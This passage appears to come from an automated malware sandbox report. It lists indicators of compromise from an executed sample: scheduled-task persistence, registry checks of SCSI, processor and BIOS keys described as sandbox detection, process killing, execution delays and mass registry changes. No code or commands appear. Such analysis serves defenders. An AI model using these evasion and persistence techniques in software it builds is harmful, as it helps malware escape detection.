C:\Windows\Tasks\JWccChrZepOVqMLId.job svchost.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File opened for modification C:\Windows\Installer\MSI1FA1.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI47AA.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI498F.tmp msiexec.exe File created C:\Windows\Tasks\JWccChrZepOVqMLId.job schtasks.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File created C:\Windows\Tasks\TXAwOSJqerYTzUX.job schtasks.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 16 IoCs
pid pid_target Process procid_target 4888 4452 WerFault.exe 95 4512 1868 WerFault.exe 108 2384 3548 WerFault.exe 123 2128 1868 WerFault.exe 108 3048 4452 WerFault.exe 95 1788 1868 WerFault.exe 108 4728 4452 WerFault.exe 95 5484 4452 WerFault.exe 95 5356 1868 WerFault.exe 108 5720 1868 WerFault.exe 108 5980 5208 WerFault.exe 142 6040 1868 WerFault.exe 108 2748 1868 WerFault.exe 108 5300 4452 WerFault.exe 95 5036 4452 WerFault.exe 95 2972 4452 WerFault.exe 95 -
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun05532f7abc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI stgbdvv Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI stgbdvv Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI stgbdvv Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI stgbdvv Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun05532f7abc.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun05532f7abc.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI stgbdvv Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI stgbdvv Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI stgbdvv Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI stgbdvv Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI stgbdvv -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Sun05ac1b0207d3ff3b8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Sun05ac1b0207d3ff3b8.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe -
Creates scheduled task(s) 1 TTPs 14 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6604 schtasks.exe 2228 schtasks.exe 6912 schtasks.exe 2592 schtasks.exe 6312 schtasks.exe 6356 schtasks.exe 7456 schtasks.exe 1036 schtasks.exe 1844 schtasks.exe 3748 schtasks.exe 7024 schtasks.exe 3348 schtasks.exe 6508 schtasks.exe 8068 schtasks.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 6696 timeout.exe 6232 timeout.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS SimplInst.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName SimplInst.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Kills process with taskkill 6 IoCs
pid Process 4224 taskkill.exe 2656 taskkill.exe 7584 taskkill.exe 5592 taskkill.exe 5360 taskkill.exe 5684 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch mqQpCvn.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" mqQpCvn.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\OneDrive.exe = "11000" OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix UbmPrUN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache UbmPrUN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket UbmPrUN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{A87958FF-B414-7748-9183-DBF183A25905} OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "{37A9D401-0BF5-4366-9530-C75C6DC23EC9}" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0" MicrosoftEdge.exe Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\INTERFACE\{1B71F23B-E61F-45C9-83BA-235D55F50CF9}\PROXYSTUBCLSID32 OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\ = "SyncingOverlayHandler2 Class" OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\ProxyStubClsid32\ = "{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}" OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "%windir%\\Speech_OneCore\\Engines\\SR\\en-US-N\\r1033sr.lxa" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mcafee.com\ = "180" MicrosoftEdgeCP.exe Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\LOCALSERVER32 OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{20894375-46AE-46E2-BAFD-CB38975CDCE6}\ = "ShareHandler Class" OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Directory\shellex\ContextMenuHandlers\ FileSyncEx OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{0776ae27-5ab9-4e18-9063-1836da63117a}\ = "IDeleteLibraryCallback" OneDriveSetup.exe Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{1196AE48-D92B-4BC7-85DE-664EC3F761F1} OneDriveSetup.exe Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\INTERFACE\{22A68885-0FD9-42F6-9DED-4FB174DC7344}\PROXYSTUBCLSID32 OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{2EB31403-EBE0-41EA-AE91-A1953104EA55}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" OneDriveSetup.exe Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance FileSyncConfig.exe Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\INTERFACE\{944903E8-B03F-43A0-8341-872200D2DA9C}\PROXYSTUBCLSID32 OneDriveSetup.exe Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282} OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{D0ED5C72-6197-4AAD-9B16-53FE461DD85C}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{e9de26a1-51b2-47b4-b1bf-c87059cc02a7}\TypeLib\Version = "1.0" OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{fac14b75-7862-4ceb-be41-f53945a61c17}\TypeLib\Version = "1.0" OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "6;18;22" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{da82e55e-fa2f-45b3-aec3-e7294106ef52}\ = "IFileSyncClient5" OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{049FED7E-C3EA-4B66-9D92-10E8085D60FB} OneDriveSetup.exe Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\INTERFACE\{6A821279-AB49-48F8-9A27-F6C59B4FF024}\PROXYSTUBCLSID32 OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{390AF5A7-1390-4255-9BC9-935BFCFA5D57}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{1b7aed4f-fcaf-4da4-8795-c03e635d8edc}\ = "IIsMappingValidCallback" OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{a7126d4c-f492-4eb9-8a2a-f673dbdd3334} OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\www.mcafee.com MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\INTERFACE\{944903E8-B03F-43A0-8341-872200D2DA9C}\PROXYSTUBCLSID32 OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\SyncEngineStorageProviderHandlerProxy.SyncEngineStorageProviderHandlerProxy\CurVer OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\TypeLib\{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C} OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "436;41c;401;801;c01;1001;1401;1801;1c01;2001;2401;2801;2c01;3001;3401;3801;3c01;4001;42b;42c;82c;42d;423;402;455;403;c04;1004;1404;41a;405;406;465;413;813;809;c09;1009;1409;1809;1c09;2009;2409;2809;2c09;3009;3409;425;438;429;40b;80c;c0c;100c;140c;180c;456;437;807;c07;1007;1407;408;447;40d;439;40e;40f;421;410;810;44b;457;412;812;440;426;427;827;42f;43e;83e;44e;450;414;814;415;416;816;446;418;419;44f;c1a;81a;41b;424;80a;100a;140a;180a;1c0a;200a;240a;280a;2c0a;300a;340a;380a;3c0a;400a;440a;480a;4c0a;500a;430;441;41d;81d;45a;449;444;44a;41e;41f;422;420;820;443;843;42a;540a" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" MicrosoftEdge.exe Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A} OneDriveSetup.exe Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}\VERSIONINDEPENDENTPROGID OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\NucleusNativeMessaging.NucleusNativeMessaging\CLSID\ = "{917E8742-AA3B-7318-FA12-10485FB322A2}" OneDriveSetup.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mcafee.com\Total = "183" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{47E6DCAF-41F8-441C-BD0E-A50D5FE6C4D1}\ProgID OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\TYPELIB\{638805C3-4BA3-4AC8-8AAC-71A0BA2BC284}\1.0\HELPDIR OneDriveSetup.exe Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\INTERFACE\{9D613F8A-B30E-4938-8490-CB5677701EBF}\PROXYSTUBCLSID32 OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{1B71F23B-E61F-45C9-83BA-235D55F50CF9}\TypeLib\Version = "1.0" OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}\ProgID OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "%windir%\\Speech_OneCore\\Engines\\SR\\en-US-N\\lsr1033.lxa" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{79A2A54C-3916-41FD-9FAB-F26ED0BBA755}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{e9de26a1-51b2-47b4-b1bf-c87059cc02a7}\TypeLib\ = "{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}" OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{2B865677-AC3A-43BD-B9E7-BF6FCD3F0596} OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\TypeLib\{082D3FEC-D0D0-4DF6-A988-053FECE7B884}\1.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\\1" OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Directory\Background\shellex\ContextMenuHandlers\ FileSyncEx OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "404" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local 